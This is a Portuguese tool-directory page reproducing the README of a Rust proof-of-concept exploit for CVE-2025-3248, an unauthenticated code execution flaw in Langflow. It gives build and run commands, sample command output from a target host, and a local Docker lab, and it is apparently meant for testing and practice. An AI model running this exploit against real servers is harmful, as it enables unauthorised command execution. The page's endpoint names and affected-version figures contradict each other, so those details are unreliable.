Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-3248-POC — Exploração de prova de conceito baseada em Rust para CVE-2025-3248, um RCE não autenticado crítico no Langflow via /api/v1/validate/code, permitindo execução arbitrária de comandos. | Kitploit
Ferramentas/GitHubGitHub/b0ysie7e/cve-2025-3248-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubb0ysie7e/cve-2025-3248-poc

CVE-2025-3248-POC

Exploração de prova de conceito baseada em Rust para CVE-2025-3248, um RCE não autenticado crítico no Langflow via /api/v1/validate/code, permitindo execução arbitrária de comandos.

Ver Repositório
1há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Langflow RCE Exploit - CVE-2025-3248

⚠️ Aviso Legal
Este código destina-se estritamente a fins educacionais e de pesquisa. O uso não autorizado em sistemas sem permissão explícita pode constituir violação da lei.
O autor não se responsabiliza por qualquer uso indevido ou atividade maliciosa envolvendo esta ferramenta.


Informações da Vulnerabilidade

CVE-2025-3248 - Crítica

Pontuação CVSS: 9.8 | Pontuação EPSS: 92.57% | Publicado: 22 de maio de 2025

Versões Afetadas

  • Vulneráveis: Todas as versões ≤ v1.3.0
  • Corrigidas: Versões v1.3.0+

Vetor de Ataque

O endpoint /api/v1/validate/code aceita código Python não sanitizado e o executa diretamente com exec(), sem exigir autenticação.

Código Vulnerável
root@kitploit:~
# langflow/api/builder/execute.py
exec(code)  # No input validation or sandboxing!

Análise Técnica

O Langflow expõe um endpoint /api/v1/builder/execute_code que recebe código Python fornecido pelo usuário e o passa diretamente para exec() no backend. Como não há autenticação nem sandbox, os atacantes podem criar payloads arbitrários para execução de código.

Executar o exploit

Requisitos

  • Rust 1.70+ (instalar via rustup)
  • Cargo (gerenciador de pacotes do Rust)
root@kitploit:~
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC

cargo build --release

# ./target/release/CVE-2025-3248-POC
root@kitploit:~
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"

Exemplo:

root@kitploit:~
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860, 
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)   

Configuração do Laboratório Local

Início Rápido

root@kitploit:~
> cd lab
> sudo docker-compose up -d

> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'

Parar o Laboratório

root@kitploit:~
> sudo docker-compose down
Baixar ferramenta